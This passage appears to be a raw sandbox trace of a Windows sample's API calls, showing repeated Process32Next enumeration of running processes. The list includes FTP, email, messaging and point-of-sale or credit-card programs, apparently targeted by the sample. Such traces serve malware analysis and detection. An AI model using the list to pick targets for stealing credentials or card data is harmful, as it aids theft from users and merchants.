dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0254.992] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x210, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0254.994] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x460, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0255.049] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0255.051] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0255.053] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x604, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0255.056] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x64c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0255.058] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2f, th32ParentProcessID=0x798, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0255.060] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0255.062] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x894, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0255.065] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x908, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0255.067] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbd0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0255.069] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xba8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0255.071] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xad4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0255.073] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x670, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0255.075] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x9d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0255.077] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x128, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x670, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0255.079] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x428, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="degree_sing_pretty.exe")) returned 1 [0255.081] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="work-heavy.exe")) returned 1 [0255.083] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="member.exe")) returned 1 [0255.085] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="real-new.exe")) returned 1 [0255.088] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="letter.exe")) returned 1 [0255.144] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc04, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="lightwhere.exe")) returned 1 [0255.147] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="charge_model_ready.exe")) returned 1 [0255.149] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fearfew.exe")) returned 1 [0255.151] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bag-begin-gas.exe")) returned 1 [0255.154] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd64, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="take whether.exe")) returned 1 [0255.156] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="common trade station.exe")) returned 1 [0255.158] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xda8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="small_money.exe")) returned 1 [0255.161] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdbc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="magazineofficialteach.exe")) returned 1 [0255.163] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="involve.exe")) returned 1 [0255.165] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdd4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="religious_free_generation.exe")) returned 1 [0255.167] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="hair friend will.exe")) returned 1 [0255.169] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdf4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="whose.exe")) returned 1 [0255.171] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe80, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0255.173] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0255.175] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0255.177] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0255.179] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xeb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0255.181] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xeb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0255.234] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xec4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0255.236] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xecc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0255.239] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xed4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0255.241] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xedc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0255.244] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf04, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0255.255] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0255.257] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0255.260] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf1c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0255.266] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0255.269] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0255.271] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf4c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0255.273] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0255.338] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0255.352] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf68, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0255.359] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0255.361] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf8c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0255.363] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf98, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0255.366] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfa0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0255.368] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0255.374] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0255.376] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfd0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0255.379] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfe0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0255.381] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xff4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0255.383] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x878, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0255.407] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x858, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0255.409] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0255.412] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0255.414] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x660, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0255.416] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb2c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0255.421] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x72c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0255.424] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1004, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0255.426] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1014, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0255.428] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x101c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0255.429] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x102c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0255.431] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x103c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0255.437] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1048, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0255.439] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1054, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0255.441] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x108c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="discussion.exe")) returned 1 [0255.443] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1094, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="styledesignbusiness.exe")) returned 1 [0255.445] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x109c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="new_door.exe")) returned 1 [0255.447] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bed fight.exe")) returned 1 [0255.543] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="federal hotel.exe")) returned 1 [0255.546] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0255.549] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0255.551] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc9c, 